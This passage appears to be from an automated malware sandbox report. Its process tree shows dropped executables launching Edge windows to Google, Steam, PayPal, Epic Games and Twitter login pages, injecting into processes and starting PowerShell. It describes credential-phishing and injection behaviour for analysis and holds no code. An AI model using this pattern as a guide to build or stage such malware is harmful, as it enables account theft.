        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8214814055810349842,5474263535959216658,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        6⤵
        
        PID:5400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1192
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:2804
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
        6⤵
        
        PID:5408
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
        6⤵
        
        PID:5556
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
        6⤵
        
        PID:5160
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
        6⤵
        
        PID:6216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
        6⤵
        
        PID:6728
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
        6⤵
        
        PID:6692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
        6⤵
        
        PID:3880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
        6⤵
        
        PID:3900
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
        6⤵
        
        PID:7236
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
        6⤵
        
        PID:7428
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
        6⤵
        
        PID:7684
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
        6⤵
        
        PID:7868
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
        6⤵
        
        PID:7944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
        6⤵
        
        PID:8160
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
        6⤵
        
        PID:8184
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
        6⤵
        
        PID:6908
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
        6⤵
        
        PID:7016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1
        6⤵
        
        PID:8176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1
        6⤵
        
        PID:4048
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9852 /prefetch:8
        6⤵
        
        PID:6208
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9852 /prefetch:8
        6⤵
        
        PID:6120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
        6⤵
        
        PID:3924
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,16883105284243295999,4672947271951888038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8080 /prefetch:1
        6⤵
        
        PID:5496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4464
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:908
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,85286893108115480,17692829874437365710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        6⤵
        
        PID:5456
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,85286893108115480,17692829874437365710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4588
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:4844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,7871126229039194543,3464158762391845198,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
        6⤵
        
        PID:5440
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,7871126229039194543,3464158762391845198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:4576
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,10603163953563890706,10211984286679723267,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6336
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,10603163953563890706,10211984286679723267,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
        6⤵
        
        PID:6328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x17c,0x180,0x184,0x158,0x188,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:1012
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,10811342554701137559,6128898059109825351,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        6⤵
        
        PID:6344
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,10811342554701137559,6128898059109825351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:2108
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,2762775263296363212,12507552977300410157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:1740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        
        PID:5784
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffec6ef46f8,0x7ffec6ef4708,0x7ffec6ef4718
        6⤵
        
        PID:5848
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Fr1634.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Fr1634.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:6264
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:6596
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6596 -s 540
        6⤵
        Program crash
        
        PID:7908
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\7Lf85jM.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\7Lf85jM.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:7876
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\8mM638Nu.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\8mM638Nu.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
- C:\Users\Admin\AppData\Local\Temp\BA62.exe
  C:\Users\Admin\AppData\Local\Temp\BA62.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5700
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    PID:7860
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6116
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6820
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:1356
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:7212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      PID:5708
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
